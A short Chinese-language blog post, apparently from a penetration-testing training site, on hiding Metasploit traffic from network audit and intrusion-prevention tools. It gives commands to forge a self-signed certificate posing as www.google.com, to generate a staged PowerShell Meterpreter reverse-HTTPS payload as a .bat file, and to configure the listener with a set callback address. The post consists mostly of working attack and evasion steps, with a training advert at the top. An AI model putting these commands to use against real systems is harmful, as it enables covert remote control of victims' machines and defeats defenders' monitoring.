MSF流量加密躲避检测
【推荐学习】暗月渗透测试培训 十多年渗透经验,体系化培训渗透测试 、高效学习渗透测试,欢迎添加微信好友aptimeok 咨询。
为了防止主机被入侵,现在大部分的内网环境都装有流量审计工具,专门用来分析审查流量特征,分析网络流量,如后门特征、行为特征,像metasploit在内网做横行渗透时,这些流量很容易就能被检测出来,所以做好流量加密,就能避免审计工具检测出来。
OpenSSL创建SSL/TLS证书
openssl req -new -newkey rsa:4096 -days 365 -nodes -x509 \ -subj "/C=UK/ST=London/L=London/O=Development/CN=www.google.com" \ -keyout www.google.com.key \ -out www.google.com.crt && \ cat www.google.com.key www.google.com.crt > www.google.com.pem && \ rm -f www.google.com.key www.google.com.crt
生成后门
LPORT=443 PayloadUUIDTracking=true HandlerSSLCert=www.google.com.pem StagerVerifySSLCert=true PayloadUUIDName=ParanoidStagedPSH -f psh-cmd -o pentestlab.bat

设置监听器
配置侦听器时还需要使用两个附加选项。这是为了通知处理程序它将使用的证书(与有效负载相同),并在接收到连接时执行SSL证书验证。
HandlerSSLCert StagerVerifySSLCert set payload windows/meterpreter/reverse_winhttps set LHOST 192.168.0.149 set LPORT 443 set HandlerSSLCert /home/kali/msf/www.google.com.pem set StagerVerifySSLCert true exploit

抓包数据包已经加密

从有效负载将在目标主机上执行的那一刻起,一个加密的MeterMeter会话将打开,它将不允许主机入侵防御系统检查数据包并断开连接。
原创文章,作者:mOon,如若转载,请注明出处:https://www.moonsec.com/3152.html